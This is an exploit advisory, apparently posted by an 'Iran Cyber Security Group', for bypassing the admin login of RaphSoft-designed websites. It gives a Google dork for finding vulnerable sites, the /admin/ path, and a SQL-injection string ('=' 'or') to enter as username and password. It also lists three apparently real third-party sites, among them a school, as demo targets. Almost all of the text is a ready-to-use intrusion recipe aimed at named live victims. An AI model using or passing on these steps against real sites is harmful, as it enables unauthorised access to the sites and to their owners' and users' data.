# Exploit Title : RaphSoft Control Panel Bypass Admin Page Vulnerability # Date : 2018-10-05 # Exploit Author : Iran Cyber Security Group # Google Dork : "intext:Designed by RaphSoft" # category : webapps # Tested on : Win7 , Kali Linux Proof of Concept : search google Dork : "intext:Designed by RaphSoft" Demo : Then Choose a Target and put this after URL : /admin/ And fill username and password like the information below : Username : '=' 'or' Password : '=' 'or' http://www.johnsonmarkconstructs.com/admin/ http://www.tombeyschool.com/admin/ http://www.royalstridesecuritysystems.com/admin/ # Discovered by : Mr_null